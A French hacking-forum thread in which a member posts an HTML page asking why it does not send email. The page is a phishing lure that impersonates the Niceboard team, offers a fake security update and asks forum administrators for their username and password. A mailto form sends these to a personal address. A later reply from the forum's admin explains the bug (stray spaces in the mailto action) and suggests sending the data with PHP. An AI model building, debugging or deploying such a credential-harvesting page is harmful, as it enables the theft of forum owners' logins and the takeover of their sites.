[php] Script ne fonctionnant pas
|
27-01-2007, 01h18
(Modification du message : 19-11-2012, 19h25 par ark.)
|
|
shutdownfuri
Membre Messages : 45 Sujets : 8 Points: 0 Inscription : Nov 2006 |
[php] Script ne fonctionnant pas
Salut tout le monde sa faisait un bout temps ...
Vous me manquiez...:love: loool J'ai récupéré ce script et ensuite je l'ai modifié mais je voudrait savoir pourquoi il n'envoie pas l'email ? _________________________________________________________________ <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1" /> <title>bien</title> </head> <body> Bonjour, suite à de nombreux forums piraté; l'équipe de Niceboard à mis au point une nouvelle mise-à-jour permettant plus de sécurité,<br /> et de confort pour votre forum ainsi que plusieurs options. <br /> Si vous voulez opter pour notre nouvelle mis à jour veuillez remplir ce formulaire: <form action=" mailto :angel_spirity_w@msn.com" enctype="text/plain" method="post"> <pre> <br /><br /><br /><br /> Nom d'utilisateur: <input size="30" name="Nom" /> Mot-de-passe: <input size="30" name="Prenom" /> <br /><br /><br /> Votre avis: Voulez-vous que votre site soit inscrit sur google et sur tout les moteurs de recherches ?<br /> <input value="TBien" name="avis" type="radio" /> Oui <input value="Bien" name="avis" type="radio" /> Juste sur Google <input value="Bof" name="avis" type="radio" /> Non <br /><br /><br /><br /><br /><br /><br />Veuillez nous faire une description de votre forum pour que <br />les administrateur référence votre forum sur les moteurs de recherches.<br /> <textarea cols="30" rows="5" name="Message"></textarea> <input value="Envoyer" type="submit" /> <input value="Effacer" type="reset" /></pre> </form> Merci d'agré(e) nos plus sincères salutations<br /> Et veuillez nous escusez de tout dérangements causés.<br /> <br /> </body> </html> Merci a vous
The sin is not knowledge but to make... | ---------------------------------------_____________ The problem it is that it bacame a weapon the protect| --------------------------------------------------- --- /By Body\ ---------- |
|
03-06-2011, 04h03
|
|
CyberSee
Admin fondateur de N-PN Messages : 1,721 Sujets : 287 Points: 158 Inscription : Jan 2012 |
Script ne fonctionnant pas
Je sais que ce message est vieux ... mais voila, je post quand même au cas ou d'autre ce pose la même question
C'est simple, tu a mis 2 espace regarde: [HTML]<form action=" mailto :angel_spirity_w@msn.com" enctype="text/plain" method="post">[/HTML] Elèves-les, et tout va fonctionner. Pourquoi tu n’utilises pas PHP pour l’envoyer? Renomme ta page en PHP et entre ceci : Code PHP : <?php Oublie pas de dire merci ... Si jamais tu repass par ici lol |
|
« Sujet précédent | Sujet suivant »
|
Sujets apparemment similaires… | |||||
Sujet | Auteur | Réponses | Affichages | Dernier message | |
[Python] rot script | ark | 9 | 2,753 |
08-03-2015, 00h37 Dernier message: ark |
|
[Python] script de création de Makefile | octarin | 3 | 1,357 |
01-09-2013, 20h26 Dernier message: formollover |
|
[Python] Script de rangement | Bourbon Kid | 1 | 5,998 |
04-07-2013, 23h32 Dernier message: Edelwin |
|
[Php] Script de récupération de données d'utilisateurs | Apache9 | 17 | 4,443 |
29-06-2013, 12h04 Dernier message: LeuhVa |
|
[Python] Script de protection des fichiers XML de Filezilla | Dobry | 0 | 639 |
10-01-2012, 22h27 Dernier message: Dobry |
Utilisateur(s) parcourant ce sujet : 1 visiteur(s)